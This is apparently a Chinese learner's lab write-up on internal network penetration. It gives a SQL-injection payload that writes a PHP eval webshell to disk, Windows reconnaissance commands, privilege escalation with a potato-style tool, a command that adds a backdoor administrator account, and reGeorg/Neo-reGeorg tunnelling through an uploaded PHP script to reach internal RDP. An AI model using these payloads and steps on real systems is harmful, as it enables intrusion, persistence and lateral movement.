内网渗透

能控制目标服务之后：
​ 尝试获取内网中的数据，技术机密信息，公司经营状况。
核心的作用是：用来证明漏洞危害=》提权(msf、烂土豆)、权限维持、流量代理(方便发动后续的进攻)、突破到核心区域

1、通过种种方法getshell：

eg：通过sql注入-》错误传参查绝对路径：

==》对mysql进行操作：
union select ‘<?php eval($_REQUEST[8])?>’ into outfile ‘c:/phpstudy/www/125.php’

2. 信息收集

我是谁

基本主机信息    systeminfo
netstat -ano   查看本机开放的端口
用户信息    net user / whoami
防护信息    通过进程判断是否有防护   tasklist /svc
任务进程等    tasklist 
域控问题

权限很低
得知操作系统为Microsoft Windows Server 2008 R2 Standard
安装了 2 个修补程序。

              [01]: KB2999226
              [02]: KB976902

可查询到未安装的补丁：
提权辅助页面： https://i.hacking8.com/tiquan/

net user：

得知用户信息

通过进程可查询使用了什么防火墙：
https://www.ddosi.org/av/1.php

我在哪:
​ 吃经验的操作、内网的路由信息

arp -a
route print    查看路由表

这里我也看不太懂。。

3、提权

根据操作系统未打补丁的漏洞提权
or上传提权工具：

烂土豆提权：原理不晓得，用就完事了
通过webshell工具上传

在cmd使用时附带tudou.exe -p “xxxx”

提权成功

4. 进行后续攻击

1. 创建用户
   tudou.exe -p “net user zbs admin<span>@123</span> /add”
   tudou.exe -p “net localgroup administrators zbs /add”

1. 探测端口服务信息
   netstat -ano 查看本机开放的端口:

发现开放了很多端口
eg：10.0.1.4:3389-》一般都是远程桌面功能的端口
但是内网资源外网无法直接访问：内网IP存在nat转换
gognj2dm.aqlab.cn:3389

我们之前探测到服务器os为windows2008，所以这里并不是我们的目标,gognj2dm.aqlab.cn:3389映射到了别的地方：
gognj2dm.aqlab.cn => 公网IP ( 只要能上网，就能访问到它) => 在路由器上有设置端口转发： xxxx【我们并不知道xxxx为多少】 => 10.0.1.4:3389
10.0.1.4:3389 => 内网IP => 内网IP是不能直接从公网访问

想要利用 10.0.1.4:3389 端口，需要确保gognj2dm.aqlab.cn 有一条端口映射，映射到了10.0.1.4:3389
就到了下一步，流量代理；

5、流量代理

流量代理分为正向代理和反向代理
这里先研究的是正向代理
【我才不会说反向代理我没听懂】

正向代理 通常使用的是 socks协议 不能转发ping的请求

将攻击流量导入内网

1. 目标靶机不能出网的情况
2. 没有公网IP时

实现：

​ 在目标服务器上运行一个新的服务，这个服务会将用户的请求转发到内网，从而实现对内网中的其他服务进行访问

本机的流量转发工具，就能将本机的一些攻击流量，转发到目标内网服务中

http://gognj2dm.aqlab.cn/tunnel.nosocket.php   这个web服务器  => 10.0.1.4

首先就要用到regeorg：

先将网站对应语言的tunnel文件上传,这里网站用的是php，把tunnel.nosocket.php服务通过webshell工具上传：

他就相当于你的一个通信站，你传递给目标内网的信息都由这个PHP文件来转发处理
当页面返回Georg says, ‘All seems fine’ 就没有问题
然后调用reGeorgSocksProxy.py：
python2 reGeorgSocksProxy.py -l 127.0.0.1 -p 66666 -u “http://gognj2dm.aqlab.cn/socket.php“
去连接socket.php,然后再本地(127.0.0.1)开启的66666端口，
只要你往66666端口传参，那么你就是在访问目标内网

python2有点小毛病，改用：
Neo-reGeorg 是 reGeorg 和 reDuh 的升级版，是为了应付复杂的网络环境重构的项目。该工具基于 HTTP(S) 协议建立隧道，会在本地创建 Socket 监听 1080 端口用于正向代理访问 Web 服务器隧道脚本，通过正向代理的方式把数据加密封装到 HTTP 数据包中转发到服务器的横向网络中，同时隧道脚本也会把内网服务器端口的数据加密封装到 HTTP 数据包中转发到本地的 Socket 接口。
（摘选自网路）

简单来说就是当我们控制了一台web服务器，想把该服务器做跳板在目标内网中横向跳转时使用。我们可以上传jsp、php、asp等动态页面，通过访问页面的形式来实现socks代理或者端口转发的功能。

生成socket

把对应语言的socket上传到服务器：

然后再在攻击机上：
python neoreg.py -k 361361 -u http://gognj2dm.aqlab.cn/socket2.php -l 127.0.0.1 -p 6666 -t 目标ip：端口
这里-t 先不写，去连接socket.php,然后再本地(127.0.0.1)开启的6666端口

浏览器配置一下代理：

然后就可以访问目标内网了：

证明流量代理成功了

不配置是无法访问的：

现在只要给我们的远程桌面连接也配置一下127.0.0.1:6666 代理就可以访问10.0.1.4:3389了
用到proxifier：

然后我们使用mstsc.exe时，就会通过127.0.0.1：6666去访问，经由我们regeorg开启的socket2.php服务去访问目标的内网

元神启动！

登陆了3389后，那电脑就是你的了